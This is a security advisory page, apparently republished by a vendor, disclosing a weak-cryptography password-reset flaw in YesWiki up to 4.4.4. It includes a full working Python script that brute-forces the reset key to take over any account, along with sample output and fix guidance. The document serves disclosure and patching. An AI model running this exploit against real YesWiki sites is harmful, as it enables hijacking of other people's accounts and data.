GHSA-4fvx-h823-38v3
CRITICALYesWiki Uses a Broken or Risky Cryptographic Algorithm
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
yeswiki/yeswikiReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The use of a weak cryptographic algorithm and a hard-coded salt to hash the password reset key allows it to be recovered and used to reset the password of any account.
Details
Firstly, the salt used to hash the password reset key is hard-coded in the includes/services/UserManager.php file at line 36 :
private const PW_SALT = 'FBcA';
Next, the application uses a weak cryptographic algorithm to hash the password reset key. The hash algorithm is defined in the includes/services/UserManager.php file at line 201 :
protected function generateUserLink($user)
{
// Generate the password recovery key
$key = md5($user['name'] . '_' . $user['email'] . random_int(0, 10000) . date('Y-m-d H:i:s') . self::PW_SALT);
The key is generated from the user's name, e-mail address, a random number between 0 and 10000, the current date of the request and the salt. If we know the user's name and e-mail address, we can retrieve the key and use it to reset the account password with a bit of brute force on the random number.
Proof of Concept (PoC)
To demonstrate the vulnerability, I created a python script to automatically retrieve the key and reset the password of a provided username and email.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Nishacid
# YesWiki <= 4.4.4 Account Takeover via Weak Password Reset Crypto
from hashlib import md5
from requests import post, get
from base64 import b64encode
from sys import exit
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from argparse import ArgumentParser
# Known data
salt = 'FBcA' # Hardcoded salt
random_range = 10000 # Range for random_int()
WORKERS = 20 # Number of workers
# Arguments
def parseArgs():
parser = ArgumentParser()
parser.add_argument("-u", "--username", dest="username", default=None, help="Username of the account", required=True)
parser.add_argument("-e", "--email", dest="email", default=None, help="Email of the account", required=True)
parser.add_argument("-d", "--domain", dest="domain", default=None, help="Domain of the target", required=True)
return parser.parse_args()
# Reset password request and get timestamp
def reset_password(email: str, domain: str):
response = post(
f'{domain}?MotDePassePerdu',
data={
'email': email,
'subStep': '1'
},
headers={
'Content-Type': 'application/x-www-form-urlencoded'
}
)
if response.ok:
timestamp = datetime.now() # obtain the timestamp
timestamp = timestamp.strftime('%Y-%m-%d %H:%M:%S')
print(f"[*] Requesting link for {email} at {timestamp}")
return timestamp
else:
print("[-] Error while resetting password.")
exit()
# Generate and check keys
def check_key(random_int_val: int, timestamp_req: str, domain: str, username: str, email: str):
user_base64 = b64encode(username.encode()).decode()
data = f"{username}_{email}{random_int_val}{timestamp_req}{salt}"
hash_candidate = md5(data.encode()).hexdigest()
url = f"{domain}?MotDePassePerdu&a=recover&email={hash_candidate}&u={user_base64}"
# print(f"[*] Checking {url}")
response = get(url)
# Check if the link is valid, warning depending on the language
if '<strong>Bienvenu.e' in response.text or '<strong>Welcome' in response.text:
return (True, random_int_val, hash_candidate, url)
return (False, random_int_val, None, None)
def main(timestamp_req: str, domain: str, username: str, email: str):
# Launch the brute-force
print(f"[*] Starting brute-force, it can take few minutes...")
with ThreadPoolExecutor(max_workers=WORKERS) as executor:
futures = [executor.submit(check_key, i, timestamp_req, domain, username, email) for i in range(random_range + 1)]
for future in as_completed(futures):
success, random_int_val, hash_candidate, url = future.result()
if success:
print(f"[+] Key found ! random_int: {random_int_val}, hash: {hash_candidate}")
print(f"[+] URL: {url}")
exit()
else:
print("[-] Key not found.")
if __name__ == "__main__":
args = parseArgs()
timestamp_req = reset_password(args.email, args.domain)
main(timestamp_req, args.domain, args.username, args.email)
Simply run this script with the arguments -u for the username, -e for the email and -d for the target domain.
» python3 expoit.py --username 'admin' --email '[email protected]' --domain 'http://localhost/'
[*] Requesting link for [email protected] at 2024-10-30 10:46:48
[*] Starting brute-force, it can take few minutes...
[+] Key found ! random_int: 9264, hash: 22a2751f50ba74b259818394d34020c9
[+] URL: http://localhost/?MotDePassePerdu&a=recover&email=22a2751f50ba74b259818394d34020c9&u=YWRtaW4K
Impact
Many impacts are possible, the most obvious being account takeover, which can lead to theft of sensitive data, modification of website content, addition/deletion of administrator accounts, user identity theft, etc.
Recommendation
The safest solution is to replace the salt with a random one and the hash algorithm with a more secure one. For example, you can use random bytes instead of a random integer.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | yeswiki/yeswiki | all versions | 4.4.5 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for yeswiki/yeswiki. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update yeswiki/yeswiki to 4.4.5 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-4fvx-h823-38v3 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-4fvx-h823-38v3 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-4fvx-h823-38v3. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-4fvx-h823-38v3 in your dependencies?
O3 detects GHSA-4fvx-h823-38v3 across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.